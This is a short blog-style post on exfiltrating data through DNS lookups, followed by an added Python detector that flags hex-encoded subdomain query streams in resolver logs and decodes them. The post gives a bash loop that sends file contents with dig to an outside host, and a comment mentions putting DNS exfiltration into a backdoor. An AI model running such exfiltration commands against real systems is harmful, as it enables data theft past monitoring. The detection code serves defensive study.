In this installment of Hack All The Things we will be discussing how to leverage DNS requests to exfiltrate data from a server. Note that while this is demonstrated on a Linux “victim”, the same can be done on Windows using VBScript, PowerShell, and even the fairly limited cmd.exe command prompt.
A very simple way to exfil data via a DNS request. It might be discovered by some monitoring software, but it's so simple it's a good trick to have as a last resort.
The simple BASH script:
for merp in $(cat exfilMe.hex); do dig $merp.exfil.hacktalk.net; done
We've been using a similar approach, however we coded the DNS exfil command on our own backdoor code.
A full post on the importance of data exfil is coming tomorrow.
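The post notes that this trick might be discovered by monitoring software. The following Python check is an added example, not code from the original post: it scans resolver query logs for one client sending several distinct hex-only leftmost labels under the same parent domain, then decodes them to scope what left the host. The log format (timestamp, client, query name), the two-label base-domain guess, the thresholds, and the sample data under example.net are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict

HEX = re.compile(r"^(?:[0-9a-f]{2})+$")   # even-length hex string
LONG = 16                                  # hex chars; shorter labels alone never trigger

def base_domain(qname, keep=2):
    # Assumption: last two labels approximate the registered domain (use a public-suffix list on real traffic).
    return ".".join(qname.rstrip(".").lower().split(".")[-keep:])

def find_hex_exfil(log_text, min_long=3):
    """Map (client, base domain) -> ordered hex labels, for pairs that sent
    at least min_long distinct long hex leftmost labels."""
    labels = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue                      # skip malformed lines
        _ts, client, qname = fields
        first = qname.lower().split(".")[0]
        if not HEX.match(first):
            continue
        seq = labels[(client, base_domain(qname))]
        if not seq or seq[-1] != first:   # drop immediate repeats (resolver retries)
            seq.append(first)
    return {k: v for k, v in labels.items()
            if len({x for x in v if len(x) >= LONG}) >= min_long}

def recover(hex_labels):
    """Decode the collected labels to scope what left the host."""
    return bytes.fromhex("".join(hex_labels))

def build_sample():
    # Constructed data: not from the page, not a real secret or a real log.
    secret = b"constructed sample: db_password=not-a-real-secret\n"
    chunks = [secret[i:i + 16].hex() for i in range(0, len(secret), 16)]
    lines = ["t0 10.0.0.5 www.example.org",
             "t1 10.0.0.5 d41d8cd98f00b204e9800998ecf8427e.cdn.example.com",
             "t2 10.0.0.5 cafe.example.com"]
    for n, c in enumerate(chunks):
        lines.append(f"t{n + 3} 10.0.0.7 {c}.exfil.example.net")
    lines.insert(5, lines[4])             # a retry of the second chunk
    return secret, "\n".join(lines)

if __name__ == "__main__":
    secret, log = build_sample()
    for (client, dom), labs in find_hex_exfil(log).items():
        print(client, dom, len(labs), "labels ->", recover(labs))
```

The single hash-like CDN label and the short "cafe" label stay below the threshold, while the short final chunk of the flagged stream is still collected once its longer siblings trip the rule.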